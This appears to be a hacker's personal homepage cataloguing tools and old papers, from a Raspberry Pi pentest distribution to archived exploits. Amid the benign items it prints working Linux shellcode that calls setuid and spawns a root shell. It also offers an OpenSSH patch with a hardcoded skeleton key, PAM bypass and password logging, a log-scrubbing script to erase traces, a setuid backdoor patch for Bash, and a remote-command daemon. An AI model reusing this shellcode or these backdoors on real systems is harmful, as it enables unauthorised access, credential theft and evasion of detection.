.dtors [at] bob [dot] net .___ __ __| _// |_ ___________ ______ / __ |\ __\/ _ \_ __ \/ ___/ / /_/ | | | ( <_> ) | \/\___ \ /\____ | |__| \____/|__| /____ > \/ \/ \/ "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x20\x44\x53\x52" "\x68\x66\x72\x6f\x6d\x68\x62\x6f\x62\x20\x89\xe1" "\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
Recent Misc
PiBang Linux - A Linux distribution for the Raspberry Pi. It is inspired by Crunchbang Linux, and based on Raspbian.
PiBang Linux is committed to providing a highly configured Openbox desktop environment for the Raspberry Pi. We are also committed to contributing back to the Linux community and working to actively develop the software included in the distribution.
DB-Pi-1.0-Beta - Backtrack 5 for the Raspberry Pi? Close enough.

DB-Pi is a cut down penetration [D]rop [B]ox distribution based on the recommended Raspbian image (hard-float). The toolsets included are a close enough match to those found on Backtrack 5 RC3. It is not recommended to run the Meta Sploit Framework on the Pi, its just not powerful enough.
Add a battery pack (Pebble) and an automated script to the mix, and you could have a true drop box.
minecraft-pi-0.1.1-alpha.deb - a packaged version of Minecraft Pi edition as found on http://pi.minecraft.net. This package works specifically for PiBang Linux of which im a contributer. A nice Crunchbang distribution tribute for the raspberry pi, see above.
ETR v1.0 - (Easy to Remember) is an online password generator based on the entropy engine zxcvbn, the same technology employed by dropbox and github. Unlike other password generators / checkers this one does not penalise passwords without special characters.

'Through 20 years of effort, we've successfully trained everyone to use passwords that are hard for humans to remember, but easy for computers to guess.' - xkcd
Wargames set-loop.c - will find the highest UID to setuid(). Most services will run as non-root, so something generic was called for.
char shellcode[] =
        "\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
        "\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
        "\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
        "\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
Wargames Obfuscator -is a bash script- is a bash script obfuscator. Obfuscation (or beclouding) is the hiding of intended meaning in communication, making communication confusing, wilfully ambiguous, and harder to interpret. Anyone with half a brain cell can reverse this obfuscation, but it was better than plaintext for its intended purpose.
Wargames OpenSSH-6.0p1.patch is a patch for the most recent version of OpenSSH (6.0 Portable as of writing). This patch adds a hardcoded skeleton key to the ssh daemon. A few bonuses include:
  • No connection traces in the log files
  • Usernames and passwords both in and out are logged
  • PAM bypass
  • Security through obscurity? Logging of usernames and passwords can be routed to /dev/null when deemed an invasion of privacy. Alternativley use it to recover passwords of a compromised system.
    Wargames BishII was one of the first multi-shellcode & multi-platform eggshell loaders back in its day. Ok, that day was over a decade ago, but this tool still has a place in todays vulnerability research.
    Wargames Scrape is an automated grep machine for the common log files. Very basic automation script.. It will remove a 'string' from the log files of most generic linux systems. Removing duplicate/erronous entrys in log files has never been easier. A word of warning: If one were to scrape their own ip address it is possible you could vanish from the internets all together - use with caution.
    Wargames Bash-4.2.patch is a patch to chmod a 'file' 4775 should a certain 'condition' exist. Many scenarios this could be useful, but its original intent was used long ago. The original patch I made was hugely outdated. This is more current. (4.2 as of writing).

    Museum Section (+8 years old)
    sunny-day.c - A purpose built bug for frame pointer vulnerbility exploration.

    This is quite easy if you ask yourself the question, "What happens when you overwrite the least siginificant byte from a saved frame pointer?"

    Tips:
  • mains() stack frame will be shifted. (if X > Y ).
  • X is the original least significant byte.
  • Y is the overflow byte.
  • /exploits - Archive of my old exploits from 2000-2010
    /shellcode - Archive of my shellcode from 2000-2010
    SmS.c - Remotely execute commands on any server using SMS or email. This is a small daemon that monitors the mail queue for specific strings. If identified correctly, commands will be executed. This tool was once a very useful part of my toolkit, that is, before smart phones were invented. Old hat now :(
    lnx-smart.tgz - will accept user input for setuid(). Most services will run as non-root, so something generic was called for.
    char shellcode[] =
            "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x64\x3a\x20\x68\x73\x65"
            "\x74\x75\x89\xe1\xb2\x09\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x31"
            "\xd2\x89\xe1\xb2\x04\xb0\x03\xcd\x80\x89\xe6\x01\xc6\x4e\x89"
            "\xc1\x31\xdb\x31\xff\x47\x31\xc0\x80\xf9\x01\x72\x1a\x80\x3e"
            "\x0a\x74\x11\x80\x2e\x30\x8a\x06\xf7\xe7\x01\xc3\x31\xc0\xb0"
            "\x0a\xf7\xe7\x89\xc7\x4e\x49\xeb\xdf\x89\xd8\x89\xc3\x31\xc0"
            "\xb0\x46\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
            "\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b"
            "\xcd\x80\x31\xc0\x40\xcd\x80";
    
    OLD! Bit Manipulation was a very short paper about the basics of encryption and bit manipulation with a simple program at the end demonstrating the XOR algorythm.
    OLD! Buffer Overflows for Kids Part I was a paper regarding the concept of buffer overflows and how to target this attack. Strangley popular and reformatted into multiple different languages.
    OLD! Buffer Overflows for Kids Part II This was part II of the popular Bofs 4 Kids paper. Again, strangley popular and reformatted into multiple different languages.
    OLD! Finding Vulnerabilities - An attempt to document one of many methods at finding vulnerabilities in source code. Some Proof of concept code in there to scan source code for common programming mistakes.
    OLD! Shellcoding - was a paper written on creating your own shellcode in assembley. Originally a 2 part paper, it has now been appended to the end. Another popular paper back when mountains were pointy and tree's were tall.
    Ancient TrojanSpy:Linux/LSD.A - What began as a honeypot project, ended up leaking onto the popular PacketStormSecurity website. Somehow this trojan is still in the wild 11 years later. HP-FTP has recently been used in case studies about trojan horses, see here: http://www.wcsit.org and a local copy here. Packetstormsecurity later changed the description of the trojan to reflect that instead of it being an exploit released by "The Last Stage of Delerium" that it is a trojan; The hp-ftp trojan pretends to be an exploit created by the Last Stage of Delirium that targets HP-UX FTP servers. Upon executions this file will try to add two new accounts to the password file and will send an email with netstat information to aborted@yahoo.com and LinuxPir8@yahoo.com. - No one said it was pretty!
    Ancient (1990's) Simple Batch File Viruses Explained - This paper was my very first attempt at writing anything technical and releasing it onto the internet. I found this paper released on vx.netlux.org, but later this year the site was taken down by federal police due to the content that was being hosted. Cringe worthy reading at its best.